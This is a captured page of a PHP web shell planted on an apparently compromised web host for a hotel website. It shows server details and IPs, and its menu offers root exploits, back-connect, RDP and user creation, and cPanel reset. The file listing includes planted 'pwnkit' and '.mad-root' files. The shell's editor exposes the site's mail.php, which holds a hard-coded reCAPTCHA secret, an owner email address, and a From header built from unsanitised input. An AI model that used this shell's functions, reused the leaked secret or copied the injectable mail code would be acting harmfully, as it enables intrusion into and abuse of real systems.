Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
asiatechinc /
.trash /
inscape-river-roots /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-x---
fonts
[ DIR ]
drwxr-x---
img
[ DIR ]
drwxr-x---
js
[ DIR ]
drwxr-x---
.mad-root
0
B
-rw-r--r--
about.php
9.6
KB
-rwxr-x---
attractions.php
16.13
KB
-rwxr-x---
contact.php
8.17
KB
-rwxr-x---
deluxe-room.php
10.15
KB
-rwxr-x---
footer.php
3.71
KB
-rwxr-x---
gallery.php
30.41
KB
-rwxr-x---
header.php
5.28
KB
-rwxr-x---
hmh.txt
0
B
-rwxr-x---
index.php
36.52
KB
-rwxr-x---
mail.php
1.7
KB
-rwxr-x---
premium-room.php
10.11
KB
-rwxr-x---
pwnkit
0
B
-rwxr-xr-x
superior-room.php
10.52
KB
-rwxr-x---
thank-you.php
985
B
-rwxr-x---
thanx.png
37.36
KB
-rwxr-x---
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mail.php
<?php if ($_SERVER["REQUEST_METHOD"] == "POST") { $name = $_POST["name"]; $email = $_POST["email"]; $phone = $_POST["phone"]; $message = $_POST["message"]; $captcha = $_POST['g-recaptcha-response']; $secretKey ="6Lc0VAErAAAAADfvBxjPK0577HaCvPEjCZpL1nMU"; $response = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$secretKey&response=$captcha"); $responseData = json_decode($response); if ($responseData->success) { $EmailTo = "rohit.negi.195@gmail.com"; $Subject = "Enquiry From Inscape River Roots"; // prepare email body text $Fields .= "<table border='2px' style='border-collapse:collapse; width:100%;'>"; $Fields .= "<tr>"; $Fields .= "<td style='padding:5px;'>Name</td>"; $Fields .= "<td style='padding:5px;'>".$name."</td>"; $Fields .= "</tr>"; $Fields .= "<tr>"; $Fields.= "<td style='padding:5px;'>Email</td>"; $Fields .= "<td style='padding:5px;'>".$email."</td>"; $Fields .= "</tr>"; $Fields .= "<tr>"; $Fields.= "<td style='padding:5px;'>Phone</td>"; $Fields .= "<td style='padding:5px;'>".$phone."</td>"; $Fields .= "</tr>"; $Fields .= "<tr>"; $Fields .= "<td style='padding:5px;'>Message</td>"; $Fields .= "<td style='padding:5px;'>".$message."</td>"; $Fields .= "</tr>"; $Fields .= "</table>"; // // send email $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; $headers .= 'From: '.$email. "\r\n"; $success = mail($EmailTo, $Subject, $Fields, $headers); header("Location:thank-you.php"); } else { header("Location: ".$_SERVER['HTTP_REFERER']."?error=captcha"); exit; } } ?>
Close